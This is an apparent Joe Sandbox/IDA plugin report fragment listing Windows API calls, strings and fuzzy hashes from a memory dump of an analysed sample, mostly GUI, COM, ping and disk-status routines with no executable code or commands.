                                                                  • CreateMenu.USER32 ref: 00977185
                                                                  • SetMenu.USER32(?,00000000), ref: 00977194
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00977221
                                                                  • IsMenu.USER32(?), ref: 00977237
                                                                  • CreatePopupMenu.USER32 ref: 00977241
                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0097726E
                                                                  • DrawMenuBar.USER32 ref: 00977276
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                  • String ID: 0$F
                                                                  • API String ID: 176399719-3044882817
                                                                  • Opcode ID: 0db0d9fa28981407032cff573bb5c93a97f95dffc4d97c4b0aa22293b5d960d4
                                                                  • Instruction ID: 6b15b1233714ddfeacebf689674b6e561031fe2a1595d7dc1b4cc48a46c9fc37
                                                                  • Opcode Fuzzy Hash: 0db0d9fa28981407032cff573bb5c93a97f95dffc4d97c4b0aa22293b5d960d4
                                                                  • Instruction Fuzzy Hash: A6416B76A15205EFDB10DFA4D984FAABBB9FF48310F144028F929A7361D731A910DF94
                                                                  APIs
                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0097755E
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00977565
                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00977578
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00977580
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0097758B
                                                                  • DeleteDC.GDI32(00000000), ref: 00977594
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0097759E
                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 009775B2
                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009775BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                  • String ID: static
                                                                  • API String ID: 2559357485-2160076837
                                                                  • Opcode ID: c526c129e3d25252d2d608e44078178482d70c7271460e2e6c4a929c13d13f24
                                                                  • Instruction ID: 0bf4a6e050b5400eae6cbea3c28029d496f440b22c4e18f5bdea85d01490e537
                                                                  • Opcode Fuzzy Hash: c526c129e3d25252d2d608e44078178482d70c7271460e2e6c4a929c13d13f24
                                                                  • Instruction Fuzzy Hash: 1D316B73118219BBDF119FA4DC08FEA7B69FF09724F114224FA19A61A0D731D861EBA4
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00916E3E
                                                                    • Part of subcall function 00918B28: __getptd_noexit.LIBCMT ref: 00918B28
                                                                  • __gmtime64_s.LIBCMT ref: 00916ED7
                                                                  • __gmtime64_s.LIBCMT ref: 00916F0D
                                                                  • __gmtime64_s.LIBCMT ref: 00916F2A
                                                                  • __allrem.LIBCMT ref: 00916F80
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00916F9C
                                                                  • __allrem.LIBCMT ref: 00916FB3
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00916FD1
                                                                  • __allrem.LIBCMT ref: 00916FE8
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00917006
                                                                  • __invoke_watson.LIBCMT ref: 00917077
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                  • String ID:
                                                                  • API String ID: 384356119-0
                                                                  • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                  • Instruction ID: 80dc589da4890f46286240099c9ab3a8c5993a4339b23b04dc8c3ec3dcbc2b1a
                                                                  • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                  • Instruction Fuzzy Hash: 0B71E576F00B1BABD714AE68DC41BDAB7B8AF44320F148629F514E62C1E770E9908B90
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00952542
                                                                  • GetMenuItemInfoW.USER32(009B5890,000000FF,00000000,00000030), ref: 009525A3
                                                                  • SetMenuItemInfoW.USER32(009B5890,00000004,00000000,00000030), ref: 009525D9
                                                                  • Sleep.KERNEL32(000001F4), ref: 009525EB
                                                                  • GetMenuItemCount.USER32(?), ref: 0095262F
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0095264B
                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00952675
                                                                  • GetMenuItemID.USER32(?,?), ref: 009526BA
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00952700
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00952714
                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00952735
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                  • String ID:
                                                                  • API String ID: 4176008265-0
                                                                  • Opcode ID: 0e08a5b8d88c4968aadba4230f90276164ed4ac02a9cd5ec5c3fc71f6e8d96c7
                                                                  • Instruction ID: ec33d693b3fd1332fe2dd0b3357475a26f819a442f8f5b7256af7f83999d1993
                                                                  • Opcode Fuzzy Hash: 0e08a5b8d88c4968aadba4230f90276164ed4ac02a9cd5ec5c3fc71f6e8d96c7
                                                                  • Instruction Fuzzy Hash: B061BB70915249AFDF11CF65CC88ABE7BB8FB46306F14056AFC41A3290D731AD49DB20
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00976FA5
                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00976FA8
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00976FCC
                                                                  • _memset.LIBCMT ref: 00976FDD
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00976FEF
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00977067
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$LongWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 830647256-0
                                                                  • Opcode ID: 4e4a40091782cf6976850de78204c9b3be8aacc8f048bc8ce6bd72868b30b67b
                                                                  • Instruction ID: 68dee889621826e789cbe28dc1abf56e752504733d4145b77af502184d40666b
                                                                  • Opcode Fuzzy Hash: 4e4a40091782cf6976850de78204c9b3be8aacc8f048bc8ce6bd72868b30b67b
                                                                  • Instruction Fuzzy Hash: 0B616E76A04208AFDB11DFA4CD81FEEB7F8EB49710F144159FA18AB2A1C771AD41DB50
                                                                  APIs
                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00946BBF
                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00946C18
                                                                  • VariantInit.OLEAUT32(?), ref: 00946C2A
                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00946C4A
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00946C9D
                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00946CB1
                                                                  • VariantClear.OLEAUT32(?), ref: 00946CC6
                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00946CD3
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00946CDC
                                                                  • VariantClear.OLEAUT32(?), ref: 00946CEE
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00946CF9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                  • String ID:
                                                                  • API String ID: 2706829360-0
                                                                  • Opcode ID: 9d18c5d4979acaedd7d5dd9676f991405ba3acd915249bb9b56cd3b5a4e71f62
                                                                  • Instruction ID: 43cb65820f686d7036938256e77348f9a5495c7a3693c7d6465390abf93c1d31
                                                                  • Opcode Fuzzy Hash: 9d18c5d4979acaedd7d5dd9676f991405ba3acd915249bb9b56cd3b5a4e71f62
                                                                  • Instruction Fuzzy Hash: DD419271A041199FCF04DFA8D898EAEBBB9FF48350F008079E955E7261CB30A945CFA1
                                                                  APIs
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                  • CoInitialize.OLE32 ref: 00968403
                                                                  • CoUninitialize.OLE32 ref: 0096840E
                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00982BEC,?), ref: 0096846E
                                                                  • IIDFromString.OLE32(?,?), ref: 009684E1
                                                                  • VariantInit.OLEAUT32(?), ref: 0096857B
                                                                  • VariantClear.OLEAUT32(?), ref: 009685DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                  • API String ID: 834269672-1287834457
                                                                  • Opcode ID: 4b82be25b9ca6bf4145607dcfb379d6c93eb0e4072df28b140b84edfdf218241
                                                                  • Instruction ID: d37726ff0ea317c8b71a5ca9aebcbde305c7ffaef9bad57a6a1d7456bb5c49b3
                                                                  • Opcode Fuzzy Hash: 4b82be25b9ca6bf4145607dcfb379d6c93eb0e4072df28b140b84edfdf218241
                                                                  • Instruction Fuzzy Hash: 6C619E716083129FC710DF64C848F6BB7E8AF89754F044A59F9869B2A1CF74ED44CB92
                                                                  APIs
                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00965793
                                                                  • inet_addr.WSOCK32(?,?,?), ref: 009657D8
                                                                  • gethostbyname.WSOCK32(?), ref: 009657E4
                                                                  • IcmpCreateFile.IPHLPAPI ref: 009657F2
                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00965862
                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00965878
                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009658ED
                                                                  • WSACleanup.WSOCK32 ref: 009658F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                  • String ID: Ping
                                                                  • API String ID: 1028309954-2246546115
                                                                  • Opcode ID: 50c91399b20282a8438e6bc744f0c88c2761c14fc16983ae9fe6e1d99f24bc1a
                                                                  • Instruction ID: e20f2d24839a27c24b747f5bf32a752d4819c3443bda20630f0107223b300477
                                                                  • Opcode Fuzzy Hash: 50c91399b20282a8438e6bc744f0c88c2761c14fc16983ae9fe6e1d99f24bc1a
                                                                  • Instruction Fuzzy Hash: DF516E316047009FD710DF24DC45B2A77E4FF49720F054929FA9AEB2A1DB70E840DB52
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0095B4D0
                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0095B546
                                                                  • GetLastError.KERNEL32 ref: 0095B550
                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 0095B5BD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                  • API String ID: 4194297153-14809454
                                                                  • Opcode ID: 8654a4d712f73d280395d051ae5ef358e20fa9d0fa833e8e8e607089e27db4b8
                                                                  • Instruction ID: 930188cbc1b481678562aacc517bc1ebf7a487cf96079b78c070c5e1f8727117
                                                                  • Opcode Fuzzy Hash: 8654a4d712f73d280395d051ae5ef358e20fa9d0fa833e8e8e607089e27db4b8
                                                                  • Instruction Fuzzy Hash: 0F31B235A00209DFCB04DF69C845EBE7BB8FF49306F104065FA05E7291EB709A46CB91
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 0094AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0094AABC
                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00949014
                                                                  • GetDlgCtrlID.USER32 ref: 0094901F
                                                                  • GetParent.USER32 ref: 0094903B
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 0094903E
                                                                  • GetDlgCtrlID.USER32(?), ref: 00949047
                                                                  • GetParent.USER32(?), ref: 00949063
                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00949066
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 1536045017-1403004172
                                                                  • Opcode ID: f7254764e661f3b859841fd87c27e69dd8155ac0120b95637eaad607ed747eb4
                                                                  • Instruction ID: f230ef17bf1ef37619e621f52eedbf41f07d008baa02215ba712aa628c53c717
                                                                  • Opcode Fuzzy Hash: f7254764e661f3b859841fd87c27e69dd8155ac0120b95637eaad607ed747eb4
                                                                  • Instruction Fuzzy Hash: 2921D371A04108BFDF04ABB4CC95EFEBBB9EF89310F100155FA21A72A1DB795859DA20
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 0094AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0094AABC
                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009490FD
                                                                  • GetDlgCtrlID.USER32 ref: 00949108
                                                                  • GetParent.USER32 ref: 00949124
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00949127
                                                                  • GetDlgCtrlID.USER32(?), ref: 00949130
                                                                  • GetParent.USER32(?), ref: 0094914C
                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 0094914F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 1536045017-1403004172
                                                                  • Opcode ID: d862d3777bfb5859081b2d79a880935ad654b22837a8ef934b3c55985cdba39e
                                                                  • Instruction ID: 2c44a7a92e9953fa302dc2b85334d180bf8cbab072cbfacee106320761dbf8a4
                                                                  • Opcode Fuzzy Hash: d862d3777bfb5859081b2d79a880935ad654b22837a8ef934b3c55985cdba39e
                                                                  • Instruction Fuzzy Hash: 1121D375A04108BFDF04ABA4CC85EFEBB78EF48300F000015FA15A72A1DB794855DA21
                                                                  APIs
                                                                  • GetParent.USER32 ref: 0094916F
                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00949184
                                                                  • _wcscmp.LIBCMT ref: 00949196
                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00949211
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                  • API String ID: 1704125052-3381328864
                                                                  • Opcode ID: 37efaff5c542c2395b26f58e860af79c35040c0d9531069c1b47e403f2dfaeaa
                                                                  • Instruction ID: 37eee0772c22eeccddc6e4f5ce5bc1ef8ec35b7e945574532068ce510163bbbe
                                                                  • Opcode Fuzzy Hash: 37efaff5c542c2395b26f58e860af79c35040c0d9531069c1b47e403f2dfaeaa
                                                                  • Instruction Fuzzy Hash: BF112C3734C30BB9FB113724DC0BDE7779C9B95728F200427F924A40D1FEA268A15594
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 009688D7
                                                                  • CoInitialize.OLE32(00000000), ref: 00968904
                                                                  • CoUninitialize.OLE32 ref: 0096890E
                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00968A0E
                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00968B3B
                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00982C0C), ref: 00968B6F
                                                                  • CoGetObject.OLE32(?,00000000,00982C0C,?), ref: 00968B92
                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00968BA5
                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00968C25
                                                                  • VariantClear.OLEAUT32(?), ref: 00968C35
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                  • String ID:
                                                                  • API String ID: 2395222682-0
                                                                  • Opcode ID: 77875ca7526d7572c9cc92e4d84431574f4679af22d6f75c35225b61db7f1c5c
                                                                  • Instruction ID: e4a4e965cb4b3e712b10e64bb21ab5ae71169e7a7d9c9bc5439671a0fa92a687
                                                                  • Opcode Fuzzy Hash: 77875ca7526d7572c9cc92e4d84431574f4679af22d6f75c35225b61db7f1c5c
                                                                  • Instruction Fuzzy Hash: 98C1F3B1608305AFC700DF68C884A6BB7E9FF89348F004A5DF98A9B251DB71ED45CB52
                                                                  APIs
                                                                  • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00957A6C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafeVartype
                                                                  • String ID:
                                                                  • API String ID: 1725837607-0
                                                                  • Opcode ID: a4e50a4dd3a3ed896a11a6b84340633d479008aae30b64b4bf4302728d4a8a0d
                                                                  • Instruction ID: 026f8705af6d85e519bd437d898d324f5078ce0ba09a5912f5350d114c89b913
                                                                  • Opcode Fuzzy Hash: a4e50a4dd3a3ed896a11a6b84340633d479008aae30b64b4bf4302728d4a8a0d
                                                                  • Instruction Fuzzy Hash: 7EB18F719082099FDB00DFE6E895BBEB7B8FF49322F104425E941E7351D734AA49CBA1
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 009511F0
                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00950268,?,00000001), ref: 00951204
                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0095120B
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00950268,?,00000001), ref: 0095121A
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0095122C
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00950268,?,00000001), ref: 00951245
